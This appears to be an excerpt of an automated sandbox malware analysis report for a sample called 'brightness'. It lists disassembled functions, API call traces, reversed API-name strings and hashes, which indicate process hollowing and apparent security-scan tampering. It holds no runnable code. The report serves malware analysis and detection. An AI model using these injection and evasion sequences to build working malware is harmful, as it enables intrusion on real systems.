                                                                                                                                                                          • Opcode ID: 342d9e4659fb58f1a2983f6257ad05a02ec64f6a873b1131e7a77973f3686bad
                                                                                                                                                                          • Instruction ID: 2cb3b4f61eb0d069080170052985db45d3d3f11b5c06b1a5769c56e18b316b10
                                                                                                                                                                          • Opcode Fuzzy Hash: 342d9e4659fb58f1a2983f6257ad05a02ec64f6a873b1131e7a77973f3686bad
                                                                                                                                                                          • Instruction Fuzzy Hash: EA11617564020DAFEB00EF95DC81EEEB7EDEB89710F414464F904D7280D730AA148B60
                                                                                                                                                                          Function 0291824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029182BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                          • API String ID: 2521977463-737317276
                                                                                                                                                                          • Opcode ID: d7e5026e661906f994c5a057a4688d7c93ec1de556004f9cc9442b212ab9e62b
                                                                                                                                                                          • Instruction ID: 583f35fb29f958708ece782d8d370dcd4513469dc14d9278c9f82285da04016e
                                                                                                                                                                          • Opcode Fuzzy Hash: d7e5026e661906f994c5a057a4688d7c93ec1de556004f9cc9442b212ab9e62b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A016974A0020CAFEB00EFA9D881EAE77EEFB89B00F414860F904D7680C630AD119B64
                                                                                                                                                                          Function 02917CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                          • API String ID: 2719805696-3542721025
                                                                                                                                                                          • Opcode ID: 7c35a8845def5404149cbff49d20473be093fef49f57d098b7bba16d13ec45f0
                                                                                                                                                                          • Instruction ID: 520af47f05858f8e5ff2e47348a44a938e88acea7c31f342f159b6992f139bc9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c35a8845def5404149cbff49d20473be093fef49f57d098b7bba16d13ec45f0
                                                                                                                                                                          • Instruction Fuzzy Hash: 8401E975A4420DAFEB00EF99D885EAEB7EDEF89B10F514854F904D76C0D730AA148B61
                                                                                                                                                                          Function 029184BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 02918521
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                                                          • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                          • API String ID: 3503870465-2520021413
                                                                                                                                                                          • Opcode ID: 61931a2efe4788e938c7c3aafd9ae2787375f9a0fb08c43e097f4ef46864981d
                                                                                                                                                                          • Instruction ID: dfa4a85b6502a45067c30ef570b3344c6bba233c4f43f5520db56b1fb3c3a994
                                                                                                                                                                          • Opcode Fuzzy Hash: 61931a2efe4788e938c7c3aafd9ae2787375f9a0fb08c43e097f4ef46864981d
                                                                                                                                                                          • Instruction Fuzzy Hash: E9016774A4430CAFFB01EFA5DC45EAE77EEFBC9B10F5148A0F50097680D730A9049A54
                                                                                                                                                                          Function 0291DE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0291DEA0
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DEF2), ref: 0291DEB6
                                                                                                                                                                          • NtDeleteFile.NTDLL(?), ref: 0291DED5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1459852867-0
                                                                                                                                                                          • Opcode ID: 2616167dbdab5ab5730fad2704fb68ed97dc9a55613a4583e54f6da086eb640b
                                                                                                                                                                          • Instruction ID: e7550f01cb8262f516c3f10f0d6d8f441fa7cc3e7bf0309fc48ab4990b24abbb
                                                                                                                                                                          • Opcode Fuzzy Hash: 2616167dbdab5ab5730fad2704fb68ed97dc9a55613a4583e54f6da086eb640b
                                                                                                                                                                          • Instruction Fuzzy Hash: 38016276A4434C6EEB05E7A18D81BCD77BDAF94701F5004E29200E6091DB746B088B31
                                                                                                                                                                          Function 0291DE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                                                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0291DEA0
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DEF2), ref: 0291DEB6
                                                                                                                                                                          • NtDeleteFile.NTDLL(?), ref: 0291DED5
                                                                                                                                                                            • Part of subcall function 02904C0C: SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1694942484-0
                                                                                                                                                                          • Opcode ID: 2c8e66989093e9963a909a2a6d72f39a0bcd9087cca5bd2ac5bd64bb84d0d63c
                                                                                                                                                                          • Instruction ID: 2a0d5225f7200b2e31734b63fdaadc9b19c35c9e2ca63c488eacf49c9addca8f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c8e66989093e9963a909a2a6d72f39a0bcd9087cca5bd2ac5bd64bb84d0d63c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C01F475A4020CBEEB11EBE1CD81FDEB7FDDB98701F5045B1A604E2580EB746B048A74
                                                                                                                                                                          Function 02916D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02916CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02916D39,?,?,?,00000000), ref: 02916D19
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02916E2C,00000000,00000000,02916DAB,?,00000000,02916E1B), ref: 02916D97
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                                                          • Opcode ID: 3d78a4d03577d2dc3d98a4aef5bc194b6848e10df3424bda586d536eb6ab800a
                                                                                                                                                                          • Instruction ID: 221b8d43bbf6b1b5f2ad66806ca55f3f121fecb866d303e607b6cc9bb930d731
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d78a4d03577d2dc3d98a4aef5bc194b6848e10df3424bda586d536eb6ab800a
                                                                                                                                                                          • Instruction Fuzzy Hash: 41012B71A0870C6FF715DF62DC52C6F7BADEBC9B10B520839F501D26C0E6309920C960
                                                                                                                                                                          Function 02927CAC Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 5548 2927cac-2927e96 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 5603 2927e9c-292809b call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2904898 5548->5603 5604 2927e97 call 291881c 5548->5604 5663 29280a1-2928274 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2904798 call 290494c call 2904d20 call 2904d9c CreateProcessAsUserW 5603->5663 5664 2928f25-29290a8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2904898 5603->5664 5604->5603 5771 29282f2-29283fd call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 5663->5771 5772 2928276-29282ed call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 5663->5772 5753 2929854-292ae59 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c * 16 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 29046a4 * 2 call 291881c call 2917b90 call 2918184 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c ExitProcess 5664->5753 5754 29290ae-29290bd call 2904898 5664->5754 5754->5753 5764 29290c3-2929396 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 291e974 call 290480c call 290494c call 29046a4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2907e10 5754->5764 6022 292964e-292984f call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 29049a4 call 2918ba8 5764->6022 6023 292939c-2929649 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2904d8c * 2 call 2904734 call 291df00 5764->6023 5874 2928404-2928724 call 29049a4 call 291e0c4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 291cf9c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 5771->5874 5875 29283ff-2928402 5771->5875 5772->5771 6191 2928726-2928738 call 291857c 5874->6191 6192 292873d-2928f20 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c ResumeThread call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c CloseHandle call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 2917ecc call 2918798 * 6 CloseHandle call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 291881c 5874->6192 5875->5874 6022->5753 6023->6022 6191->6192 6192->5664
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A567DC,02A56820,OpenSession,0296237C,0292B40C,UacScan,0296237C), ref: 0292826D
                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,UacScan,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C), ref: 029288B7
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,UacScan,0296237C,0292B40C,00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C), ref: 02928A36
                                                                                                                                                                            • Part of subcall function 02918798: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                            • Part of subcall function 02918798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                            • Part of subcall function 02918798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0296237C,0292B40C,UacInitialize,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,UacScan,0296237C), ref: 02928E28
                                                                                                                                                                            • Part of subcall function 02907E10: GetFileAttributesA.KERNEL32(00000000,?,0291FD00,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,UacScan,0296237C,0292B40C,UacInitialize), ref: 02907E1B
                                                                                                                                                                            • Part of subcall function 0291DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DFD2), ref: 0291DF3F
                                                                                                                                                                            • Part of subcall function 0291DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0291DF79
                                                                                                                                                                            • Part of subcall function 0291DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0291DFA6
                                                                                                                                                                            • Part of subcall function 0291DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0291DFAF
                                                                                                                                                                            • Part of subcall function 02918184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0291820E), ref: 029181F0
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,Initialize,0296237C,0292B40C,00000000,00000000,00000000,ScanString,0296237C,0292B40C), ref: 0292AE59
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
